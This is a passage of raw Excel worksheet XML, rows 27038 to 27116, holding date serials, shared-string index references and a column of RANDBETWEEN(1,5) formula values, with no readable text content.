    <row r="27038" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27038" s="1">
        <v>42898.274259259262</v>
      </c>
      <c r="C27038" t="s">
        <v>60</v>
      </c>
      <c r="E27038" s="2" t="s">
        <v>24597</v>
      </c>
      <c r="F27038">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27039" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27039" s="1">
        <v>42898.255543981482</v>
      </c>
      <c r="C27039" t="s">
        <v>48</v>
      </c>
      <c r="D27039" t="s">
        <v>312</v>
      </c>
      <c r="E27039" s="2" t="s">
        <v>24598</v>
      </c>
      <c r="F27039">
        <f t="shared" ca="1" si="422"/>
        <v>1</v>
      </c>
    </row>
    <row r="27040" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27040" s="1">
        <v>42898.252106481479</v>
      </c>
      <c r="C27040" t="s">
        <v>776</v>
      </c>
      <c r="E27040" s="2" t="s">
        <v>24599</v>
      </c>
      <c r="F27040">
        <f t="shared" ca="1" si="422"/>
        <v>1</v>
      </c>
    </row>
    <row r="27041" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27041" s="1">
        <v>42898.21738425926</v>
      </c>
      <c r="C27041" t="s">
        <v>65</v>
      </c>
      <c r="E27041" t="s">
        <v>24600</v>
      </c>
      <c r="F27041">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27042" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27042" s="1">
        <v>42898.217291666668</v>
      </c>
      <c r="C27042" t="s">
        <v>124</v>
      </c>
      <c r="E27042" t="s">
        <v>24601</v>
      </c>
      <c r="F27042">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27043" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27043" s="1">
        <v>42898.213564814818</v>
      </c>
      <c r="C27043" t="s">
        <v>41</v>
      </c>
      <c r="E27043" t="s">
        <v>24602</v>
      </c>
      <c r="F27043">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27044" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27044" s="1">
        <v>42898.193807870368</v>
      </c>
      <c r="C27044" t="s">
        <v>41</v>
      </c>
      <c r="E27044" s="2" t="s">
        <v>24603</v>
      </c>
      <c r="F27044">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27045" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27045" s="1">
        <v>42898.180706018517</v>
      </c>
      <c r="C27045" t="s">
        <v>43</v>
      </c>
      <c r="E27045" t="s">
        <v>24604</v>
      </c>
      <c r="F27045">
        <f t="shared" ca="1" si="422"/>
        <v>1</v>
      </c>
    </row>
    <row r="27046" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27046" s="1">
        <v>42898.160439814812</v>
      </c>
      <c r="C27046" t="s">
        <v>63</v>
      </c>
      <c r="E27046" t="s">
        <v>24605</v>
      </c>
      <c r="F27046">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27047" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27047" s="1">
        <v>42898.136724537035</v>
      </c>
      <c r="C27047" t="s">
        <v>2745</v>
      </c>
      <c r="E27047" t="s">
        <v>24606</v>
      </c>
      <c r="F27047">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27048" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A27048" s="1">
        <v>42898.13486111111</v>
      </c>
      <c r="C27048" t="s">
        <v>65</v>
      </c>
      <c r="E27048" s="2" t="s">
        <v>24607</v>
      </c>
      <c r="F27048">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27049" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27049" s="1">
        <v>42898.10864583333</v>
      </c>
      <c r="C27049" t="s">
        <v>41</v>
      </c>
      <c r="E27049" s="2" t="s">
        <v>24608</v>
      </c>
      <c r="F27049">
        <f t="shared" ca="1" si="422"/>
        <v>3</v>
      </c>
    </row>
    <row r="27050" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27050" s="1">
        <v>42897.348703703705</v>
      </c>
      <c r="C27050" t="s">
        <v>63</v>
      </c>
      <c r="E27050" t="s">
        <v>24609</v>
      </c>
      <c r="F27050">
        <f t="shared" ca="1" si="422"/>
        <v>5</v>
      </c>
    </row>
    <row r="27051" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27051" s="1">
        <v>42897.170995370368</v>
      </c>
      <c r="C27051" t="s">
        <v>339</v>
      </c>
      <c r="E27051" t="s">
        <v>24610</v>
      </c>
      <c r="F27051">
        <f t="shared" ca="1" si="422"/>
        <v>1</v>
      </c>
    </row>
    <row r="27052" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27052" s="1">
        <v>42896.82613425926</v>
      </c>
      <c r="C27052" t="s">
        <v>48</v>
      </c>
      <c r="E27052" t="s">
        <v>24611</v>
      </c>
      <c r="F27052">
        <f t="shared" ca="1" si="422"/>
        <v>3</v>
      </c>
    </row>
    <row r="27053" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27053" s="1">
        <v>42896.505486111113</v>
      </c>
      <c r="C27053" t="s">
        <v>10</v>
      </c>
      <c r="E27053" t="s">
        <v>24612</v>
      </c>
      <c r="F27053">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27054" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27054" s="1">
        <v>42895.783935185187</v>
      </c>
      <c r="C27054" t="s">
        <v>10</v>
      </c>
      <c r="D27054" t="s">
        <v>89</v>
      </c>
      <c r="E27054" t="s">
        <v>24613</v>
      </c>
      <c r="F27054">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27055" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27055" s="1">
        <v>42895.698275462964</v>
      </c>
      <c r="C27055" t="s">
        <v>10</v>
      </c>
      <c r="D27055" t="s">
        <v>80</v>
      </c>
      <c r="E27055" t="s">
        <v>24614</v>
      </c>
      <c r="F27055">
        <f t="shared" ca="1" si="422"/>
        <v>1</v>
      </c>
    </row>
    <row r="27056" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27056" s="1">
        <v>42895.669421296298</v>
      </c>
      <c r="C27056" t="s">
        <v>10</v>
      </c>
      <c r="D27056" t="s">
        <v>52</v>
      </c>
      <c r="E27056" t="s">
        <v>24615</v>
      </c>
      <c r="F27056">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27057" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27057" s="1">
        <v>42895.666250000002</v>
      </c>
      <c r="C27057" t="s">
        <v>10</v>
      </c>
      <c r="D27057" t="s">
        <v>263</v>
      </c>
      <c r="E27057" t="s">
        <v>24616</v>
      </c>
      <c r="F27057">
        <f t="shared" ca="1" si="422"/>
        <v>3</v>
      </c>
    </row>
    <row r="27058" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27058" s="1">
        <v>42895.655810185184</v>
      </c>
      <c r="C27058" t="s">
        <v>260</v>
      </c>
      <c r="E27058" t="s">
        <v>24617</v>
      </c>
      <c r="F27058">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27059" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27059" s="1">
        <v>42895.653969907406</v>
      </c>
      <c r="C27059" t="s">
        <v>10</v>
      </c>
      <c r="D27059" t="s">
        <v>17</v>
      </c>
      <c r="E27059" t="s">
        <v>24618</v>
      </c>
      <c r="F27059">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27060" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27060" s="1">
        <v>42895.578541666669</v>
      </c>
      <c r="C27060" t="s">
        <v>222</v>
      </c>
      <c r="E27060" s="2" t="s">
        <v>24619</v>
      </c>
      <c r="F27060">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27061" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27061" s="1">
        <v>42895.577534722222</v>
      </c>
      <c r="C27061" t="s">
        <v>253</v>
      </c>
      <c r="E27061" s="2" t="s">
        <v>24620</v>
      </c>
      <c r="F27061">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27062" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27062" s="1">
        <v>42895.576840277776</v>
      </c>
      <c r="C27062" t="s">
        <v>10</v>
      </c>
      <c r="D27062" t="s">
        <v>11</v>
      </c>
      <c r="E27062" t="s">
        <v>24621</v>
      </c>
      <c r="F27062">
        <f t="shared" ca="1" si="422"/>
        <v>3</v>
      </c>
    </row>
    <row r="27063" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27063" s="1">
        <v>42895.551527777781</v>
      </c>
      <c r="C27063" t="s">
        <v>10</v>
      </c>
      <c r="D27063" t="s">
        <v>713</v>
      </c>
      <c r="E27063" t="s">
        <v>24622</v>
      </c>
      <c r="F27063">
        <f t="shared" ca="1" si="422"/>
        <v>3</v>
      </c>
    </row>
    <row r="27064" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27064" s="1">
        <v>42895.53565972222</v>
      </c>
      <c r="C27064" t="s">
        <v>10</v>
      </c>
      <c r="D27064" t="s">
        <v>39</v>
      </c>
      <c r="E27064" s="2" t="s">
        <v>24623</v>
      </c>
      <c r="F27064">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27065" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27065" s="1">
        <v>42895.527233796296</v>
      </c>
      <c r="C27065" t="s">
        <v>10</v>
      </c>
      <c r="D27065" t="s">
        <v>6</v>
      </c>
      <c r="E27065" t="s">
        <v>24624</v>
      </c>
      <c r="F27065">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27066" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27066" s="1">
        <v>42895.516168981485</v>
      </c>
      <c r="C27066" t="s">
        <v>48</v>
      </c>
      <c r="E27066" s="2" t="s">
        <v>24625</v>
      </c>
      <c r="F27066">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27067" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A27067" s="1">
        <v>42895.501620370371</v>
      </c>
      <c r="C27067" t="s">
        <v>43</v>
      </c>
      <c r="E27067" s="2" t="s">
        <v>24626</v>
      </c>
      <c r="F27067">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27068" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A27068" s="1">
        <v>42895.485497685186</v>
      </c>
      <c r="C27068" t="s">
        <v>10</v>
      </c>
      <c r="D27068" t="s">
        <v>33</v>
      </c>
      <c r="E27068" s="2" t="s">
        <v>24627</v>
      </c>
      <c r="F27068">
        <f t="shared" ca="1" si="422"/>
        <v>4</v>
      </c>
    </row>
    <row r="27069" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27069" s="1">
        <v>42895.471967592595</v>
      </c>
      <c r="C27069" t="s">
        <v>10</v>
      </c>
      <c r="D27069" t="s">
        <v>80</v>
      </c>
      <c r="E27069" t="s">
        <v>24628</v>
      </c>
      <c r="F27069">
        <f t="shared" ca="1" si="422"/>
        <v>1</v>
      </c>
    </row>
    <row r="27070" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A27070" s="1">
        <v>42895.468657407408</v>
      </c>
      <c r="C27070" t="s">
        <v>48</v>
      </c>
      <c r="E27070" s="2" t="s">
        <v>24629</v>
      </c>
      <c r="F27070">
        <f t="shared" ca="1" si="422"/>
        <v>1</v>
      </c>
    </row>
    <row r="27071" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27071" s="1">
        <v>42895.46199074074</v>
      </c>
      <c r="C27071" t="s">
        <v>10</v>
      </c>
      <c r="D27071" t="s">
        <v>17</v>
      </c>
      <c r="E27071" t="s">
        <v>24630</v>
      </c>
      <c r="F27071">
        <f t="shared" ca="1" si="422"/>
        <v>2</v>
      </c>
    </row>
    <row r="27072" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27072" s="1">
        <v>42895.456331018519</v>
      </c>
      <c r="C27072" t="s">
        <v>10</v>
      </c>
      <c r="D27072" t="s">
        <v>112</v>
      </c>
      <c r="E27072" s="2" t="s">
        <v>24631</v>
      </c>
      <c r="F27072">
        <f t="shared" ca="1" si="422"/>
        <v>3</v>
      </c>
    </row>
    <row r="27073" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27073" s="1">
        <v>42895.456087962964</v>
      </c>
      <c r="C27073" t="s">
        <v>10</v>
      </c>
      <c r="D27073" t="s">
        <v>17</v>
      </c>
      <c r="E27073" t="s">
        <v>24632</v>
      </c>
      <c r="F27073">
        <f t="shared" ca="1" si="422"/>
        <v>1</v>
      </c>
    </row>
    <row r="27074" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27074" s="1">
        <v>42895.446446759262</v>
      </c>
      <c r="C27074" t="s">
        <v>178</v>
      </c>
      <c r="E27074" s="2" t="s">
        <v>24633</v>
      </c>
      <c r="F27074">
        <f t="shared" ref="F27074:F27137" ca="1" si="423">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="27075" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27075" s="1">
        <v>42895.394270833334</v>
      </c>
      <c r="C27075" t="s">
        <v>71</v>
      </c>
      <c r="E27075" s="2" t="s">
        <v>24634</v>
      </c>
      <c r="F27075">
        <f t="shared" ca="1" si="423"/>
        <v>3</v>
      </c>
    </row>
    <row r="27076" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27076" s="1">
        <v>42895.378993055558</v>
      </c>
      <c r="C27076" t="s">
        <v>173</v>
      </c>
      <c r="E27076" t="s">
        <v>24635</v>
      </c>
      <c r="F27076">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27077" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27077" s="1">
        <v>42895.370138888888</v>
      </c>
      <c r="C27077" t="s">
        <v>10</v>
      </c>
      <c r="D27077" t="s">
        <v>112</v>
      </c>
      <c r="E27077" t="s">
        <v>24636</v>
      </c>
      <c r="F27077">
        <f t="shared" ca="1" si="423"/>
        <v>3</v>
      </c>
    </row>
    <row r="27078" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27078" s="1">
        <v>42895.35732638889</v>
      </c>
      <c r="C27078" t="s">
        <v>65</v>
      </c>
      <c r="E27078" t="s">
        <v>24637</v>
      </c>
      <c r="F27078">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
    <row r="27079" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27079" s="1">
        <v>42895.329375000001</v>
      </c>
      <c r="C27079" t="s">
        <v>776</v>
      </c>
      <c r="E27079" t="s">
        <v>24638</v>
      </c>
      <c r="F27079">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
    <row r="27080" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A27080" s="1">
        <v>42895.318506944444</v>
      </c>
      <c r="C27080" t="s">
        <v>10</v>
      </c>
      <c r="D27080" t="s">
        <v>6</v>
      </c>
      <c r="E27080" s="2" t="s">
        <v>24639</v>
      </c>
      <c r="F27080">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27081" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A27081" s="1">
        <v>42895.300462962965</v>
      </c>
      <c r="C27081" t="s">
        <v>48</v>
      </c>
      <c r="E27081" s="2" t="s">
        <v>24640</v>
      </c>
      <c r="F27081">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
    <row r="27082" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A27082" s="1">
        <v>42895.297476851854</v>
      </c>
      <c r="C27082" t="s">
        <v>71</v>
      </c>
      <c r="E27082" s="2" t="s">
        <v>24641</v>
      </c>
      <c r="F27082">
        <f t="shared" ca="1" si="423"/>
        <v>2</v>
      </c>
    </row>
    <row r="27083" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27083" s="1">
        <v>42895.143819444442</v>
      </c>
      <c r="C27083" t="s">
        <v>41</v>
      </c>
      <c r="E27083" t="s">
        <v>24642</v>
      </c>
      <c r="F27083">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
    <row r="27084" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27084" s="1">
        <v>42895.134375000001</v>
      </c>
      <c r="C27084" t="s">
        <v>71</v>
      </c>
      <c r="E27084" s="2" t="s">
        <v>24643</v>
      </c>
      <c r="F27084">
        <f t="shared" ca="1" si="423"/>
        <v>3</v>
      </c>
    </row>
    <row r="27085" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27085" s="1">
        <v>42895.047349537039</v>
      </c>
      <c r="C27085" t="s">
        <v>41</v>
      </c>
      <c r="E27085" t="s">
        <v>24644</v>
      </c>
      <c r="F27085">
        <f t="shared" ca="1" si="423"/>
        <v>2</v>
      </c>
    </row>
    <row r="27086" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27086" s="1">
        <v>42895.043043981481</v>
      </c>
      <c r="C27086" t="s">
        <v>10</v>
      </c>
      <c r="D27086" t="s">
        <v>52</v>
      </c>
      <c r="E27086" s="2" t="s">
        <v>24645</v>
      </c>
      <c r="F27086">
        <f t="shared" ca="1" si="423"/>
        <v>2</v>
      </c>
    </row>
    <row r="27087" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27087" s="1">
        <v>42895.005162037036</v>
      </c>
      <c r="C27087" t="s">
        <v>73</v>
      </c>
      <c r="D27087" t="s">
        <v>312</v>
      </c>
      <c r="E27087" t="s">
        <v>24646</v>
      </c>
      <c r="F27087">
        <f t="shared" ca="1" si="423"/>
        <v>3</v>
      </c>
    </row>
    <row r="27088" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27088" s="1">
        <v>42894.859814814816</v>
      </c>
      <c r="C27088" t="s">
        <v>10</v>
      </c>
      <c r="D27088" t="s">
        <v>6</v>
      </c>
      <c r="E27088" t="s">
        <v>24647</v>
      </c>
      <c r="F27088">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
    <row r="27089" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A27089" s="1">
        <v>42894.784212962964</v>
      </c>
      <c r="C27089" t="s">
        <v>10</v>
      </c>
      <c r="D27089" t="s">
        <v>6</v>
      </c>
      <c r="E27089" s="2" t="s">
        <v>24648</v>
      </c>
      <c r="F27089">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27090" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A27090" s="1">
        <v>42894.769571759258</v>
      </c>
      <c r="C27090" t="s">
        <v>10</v>
      </c>
      <c r="D27090" t="s">
        <v>244</v>
      </c>
      <c r="E27090" s="2" t="s">
        <v>24649</v>
      </c>
      <c r="F27090">
        <f t="shared" ca="1" si="423"/>
        <v>2</v>
      </c>
    </row>
    <row r="27091" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27091" s="1">
        <v>42894.74858796296</v>
      </c>
      <c r="C27091" t="s">
        <v>10</v>
      </c>
      <c r="D27091" t="s">
        <v>1160</v>
      </c>
      <c r="E27091" s="2" t="s">
        <v>24650</v>
      </c>
      <c r="F27091">
        <f t="shared" ca="1" si="423"/>
        <v>2</v>
      </c>
    </row>
    <row r="27092" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27092" s="1">
        <v>42894.733449074076</v>
      </c>
      <c r="C27092" t="s">
        <v>10</v>
      </c>
      <c r="D27092" t="s">
        <v>86</v>
      </c>
      <c r="E27092" t="s">
        <v>24651</v>
      </c>
      <c r="F27092">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27093" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27093" s="1">
        <v>42894.664803240739</v>
      </c>
      <c r="C27093" t="s">
        <v>10</v>
      </c>
      <c r="D27093" t="s">
        <v>89</v>
      </c>
      <c r="E27093" s="2" t="s">
        <v>24652</v>
      </c>
      <c r="F27093">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
    <row r="27094" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27094" s="1">
        <v>42894.650856481479</v>
      </c>
      <c r="C27094" t="s">
        <v>10</v>
      </c>
      <c r="D27094" t="s">
        <v>89</v>
      </c>
      <c r="E27094" s="2" t="s">
        <v>24653</v>
      </c>
      <c r="F27094">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
    <row r="27095" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27095" s="1">
        <v>42894.649050925924</v>
      </c>
      <c r="C27095" t="s">
        <v>10</v>
      </c>
      <c r="D27095" t="s">
        <v>11</v>
      </c>
      <c r="E27095" t="s">
        <v>24654</v>
      </c>
      <c r="F27095">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
    <row r="27096" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27096" s="1">
        <v>42894.633159722223</v>
      </c>
      <c r="C27096" t="s">
        <v>10</v>
      </c>
      <c r="D27096" t="s">
        <v>86</v>
      </c>
      <c r="E27096" t="s">
        <v>24655</v>
      </c>
      <c r="F27096">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27097" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27097" s="1">
        <v>42894.61928240741</v>
      </c>
      <c r="C27097" t="s">
        <v>6</v>
      </c>
      <c r="D27097" t="s">
        <v>194</v>
      </c>
      <c r="E27097" t="s">
        <v>24656</v>
      </c>
      <c r="F27097">
        <f t="shared" ca="1" si="423"/>
        <v>1</v>
      </c>
    </row>
    <row r="27098" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27098" s="1">
        <v>42894.613530092596</v>
      </c>
      <c r="C27098" t="s">
        <v>10</v>
      </c>
      <c r="D27098" t="s">
        <v>56</v>
      </c>
      <c r="E27098" t="s">
        <v>24657</v>
      </c>
      <c r="F27098">
        <f t="shared" ca="1" si="423"/>
        <v>2</v>
      </c>
    </row>
    <row r="27099" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27099" s="1">
        <v>42894.602754629632</v>
      </c>
      <c r="C27099" t="s">
        <v>10</v>
      </c>
      <c r="D27099" t="s">
        <v>36</v>
      </c>
      <c r="E27099" t="s">
        <v>24658</v>
      </c>
      <c r="F27099">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27100" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27100" s="1">
        <v>42894.592245370368</v>
      </c>
      <c r="C27100" t="s">
        <v>10</v>
      </c>
      <c r="D27100" t="s">
        <v>6</v>
      </c>
      <c r="E27100" t="s">
        <v>24659</v>
      </c>
      <c r="F27100">
        <f t="shared" ca="1" si="423"/>
        <v>2</v>
      </c>
    </row>
    <row r="27101" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27101" s="1">
        <v>42894.588784722226</v>
      </c>
      <c r="C27101" t="s">
        <v>10</v>
      </c>
      <c r="D27101" t="s">
        <v>6</v>
      </c>
      <c r="E27101" t="s">
        <v>24660</v>
      </c>
      <c r="F27101">
        <f t="shared" ca="1" si="423"/>
        <v>1</v>
      </c>
    </row>
    <row r="27102" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27102" s="1">
        <v>42894.577314814815</v>
      </c>
      <c r="C27102" t="s">
        <v>10</v>
      </c>
      <c r="D27102" t="s">
        <v>11</v>
      </c>
      <c r="E27102" t="s">
        <v>24661</v>
      </c>
      <c r="F27102">
        <f t="shared" ca="1" si="423"/>
        <v>1</v>
      </c>
    </row>
    <row r="27103" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27103" s="1">
        <v>42894.540856481479</v>
      </c>
      <c r="C27103" t="s">
        <v>10</v>
      </c>
      <c r="D27103" t="s">
        <v>41</v>
      </c>
      <c r="E27103" t="s">
        <v>24662</v>
      </c>
      <c r="F27103">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27104" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27104" s="1">
        <v>42894.54078703704</v>
      </c>
      <c r="C27104" t="s">
        <v>10</v>
      </c>
      <c r="D27104" t="s">
        <v>41</v>
      </c>
      <c r="E27104" t="s">
        <v>24662</v>
      </c>
      <c r="F27104">
        <f t="shared" ca="1" si="423"/>
        <v>2</v>
      </c>
    </row>
    <row r="27105" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27105" s="1">
        <v>42894.509143518517</v>
      </c>
      <c r="C27105" t="s">
        <v>10</v>
      </c>
      <c r="D27105" t="s">
        <v>494</v>
      </c>
      <c r="E27105" t="s">
        <v>24663</v>
      </c>
      <c r="F27105">
        <f t="shared" ca="1" si="423"/>
        <v>3</v>
      </c>
    </row>
    <row r="27106" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27106" s="1">
        <v>42894.4925</v>
      </c>
      <c r="C27106" t="s">
        <v>10</v>
      </c>
      <c r="D27106" t="s">
        <v>151</v>
      </c>
      <c r="E27106" t="s">
        <v>24664</v>
      </c>
      <c r="F27106">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
    <row r="27107" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27107" s="1">
        <v>42894.461597222224</v>
      </c>
      <c r="C27107" t="s">
        <v>10</v>
      </c>
      <c r="D27107" t="s">
        <v>17</v>
      </c>
      <c r="E27107" t="s">
        <v>24665</v>
      </c>
      <c r="F27107">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
    <row r="27108" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27108" s="1">
        <v>42894.452222222222</v>
      </c>
      <c r="C27108" t="s">
        <v>339</v>
      </c>
      <c r="F27108">
        <f t="shared" ca="1" si="423"/>
        <v>1</v>
      </c>
    </row>
    <row r="27109" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27109" s="1">
        <v>42894.44736111111</v>
      </c>
      <c r="C27109" t="s">
        <v>16</v>
      </c>
      <c r="E27109" t="s">
        <v>24666</v>
      </c>
      <c r="F27109">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
    <row r="27110" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27110" s="1">
        <v>42894.440787037034</v>
      </c>
      <c r="C27110" t="s">
        <v>10</v>
      </c>
      <c r="D27110" t="s">
        <v>41</v>
      </c>
      <c r="E27110" t="s">
        <v>24667</v>
      </c>
      <c r="F27110">
        <f t="shared" ca="1" si="423"/>
        <v>1</v>
      </c>
    </row>
    <row r="27111" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27111" s="1">
        <v>42894.430752314816</v>
      </c>
      <c r="C27111" t="s">
        <v>6</v>
      </c>
      <c r="D27111" t="s">
        <v>194</v>
      </c>
      <c r="E27111" s="2" t="s">
        <v>24668</v>
      </c>
      <c r="F27111">
        <f t="shared" ca="1" si="423"/>
        <v>1</v>
      </c>
    </row>
    <row r="27112" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27112" s="1">
        <v>42894.414259259262</v>
      </c>
      <c r="C27112" t="s">
        <v>127</v>
      </c>
      <c r="E27112" s="2" t="s">
        <v>24669</v>
      </c>
      <c r="F27112">
        <f t="shared" ca="1" si="423"/>
        <v>2</v>
      </c>
    </row>
    <row r="27113" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27113" s="1">
        <v>42894.379930555559</v>
      </c>
      <c r="C27113" t="s">
        <v>71</v>
      </c>
      <c r="E27113" s="2" t="s">
        <v>24670</v>
      </c>
      <c r="F27113">
        <f t="shared" ca="1" si="423"/>
        <v>3</v>
      </c>
    </row>
    <row r="27114" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27114" s="1">
        <v>42894.342615740738</v>
      </c>
      <c r="C27114" t="s">
        <v>10</v>
      </c>
      <c r="D27114" t="s">
        <v>178</v>
      </c>
      <c r="E27114" t="s">
        <v>24671</v>
      </c>
      <c r="F27114">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27115" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27115" s="1">
        <v>42894.295127314814</v>
      </c>
      <c r="C27115" t="s">
        <v>48</v>
      </c>
      <c r="E27115" s="2" t="s">
        <v>24672</v>
      </c>
      <c r="F27115">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
    <row r="27116" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27116" s="1">
        <v>42894.286747685182</v>
      </c>
      <c r="C27116" t="s">
        <v>41</v>
      </c>
      <c r="E27116" s="2" t="s">
        <v>24673</v>
      </c>
      <c r="F27116">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
